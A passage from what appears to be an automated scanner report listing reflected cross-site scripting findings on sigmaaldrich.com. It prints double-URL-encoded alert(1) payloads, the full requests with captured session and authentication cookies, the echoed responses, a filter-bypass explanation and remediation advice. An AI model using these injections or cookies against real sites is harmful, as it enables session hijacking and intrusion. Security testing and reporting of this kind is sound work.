Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:56 GMT
Content-Length: 28977
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrichbea4a";alert(1)//269e62f022b/areas-of-interest/life-science/life-science-catalog","E404") ;
   </script>
...[SNIP]...

1.118. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/life-science-catalog [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/life-science-catalog

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c264%2522%253balert%25281%2529%252f%252f84d63a888f4 was submitted in the REST URL parameter 3. This input was echoed as 8c264";alert(1)//84d63a888f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest8c264%2522%253balert%25281%2529%252f%252f84d63a888f4/life-science/life-science-catalog HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:58 GMT
Content-Length: 28977
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest8c264";alert(1)//84d63a888f4/life-science/life-science-catalog","E404") ;
   </script>
...[SNIP]...

1.119. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/life-science-catalog [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/life-science-catalog

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ead34%2522%253balert%25281%2529%252f%252f1355739c73c was submitted in the REST URL parameter 4. This input was echoed as ead34";alert(1)//1355739c73c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/life-scienceead34%2522%253balert%25281%2529%252f%252f1355739c73c/life-science-catalog HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:59 GMT
Content-Length: 28977
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/life-scienceead34";alert(1)//1355739c73c/life-science-catalog","E404") ;
   </script>
...[SNIP]...

1.120. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/life-science-catalog [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/life-science-catalog

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7d3ac%2522%253balert%25281%2529%252f%252f8320d84cdb5 was submitted in the REST URL parameter 5. This input was echoed as 7d3ac";alert(1)//8320d84cdb5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/life-science/life-science-catalog7d3ac%2522%253balert%25281%2529%252f%252f8320d84cdb5 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:01 GMT
Content-Length: 28977
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/life-science/life-science-catalog7d3ac";alert(1)//8320d84cdb5","E404") ;
   </script>
...[SNIP]...

1.121. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/sigma-transgenics [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/sigma-transgenics

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9588b%2522%253balert%25281%2529%252f%252fd694049d19c was submitted in the REST URL parameter 1. This input was echoed as 9588b";alert(1)//d694049d19c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content9588b%2522%253balert%25281%2529%252f%252fd694049d19c/sigma-aldrich/areas-of-interest/life-science/sigma-transgenics HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:01 GMT
Content-Length: 28974
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content9588b";alert(1)//d694049d19c/sigma-aldrich/areas-of-interest/life-science/sigma-transgenics","E404") ;
   </script>
...[SNIP]...

1.122. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/sigma-transgenics [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/sigma-transgenics

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1270%2522%253balert%25281%2529%252f%252f72a6bae4e31 was submitted in the REST URL parameter 2. This input was echoed as d1270";alert(1)//72a6bae4e31 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrichd1270%2522%253balert%25281%2529%252f%252f72a6bae4e31/areas-of-interest/life-science/sigma-transgenics HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
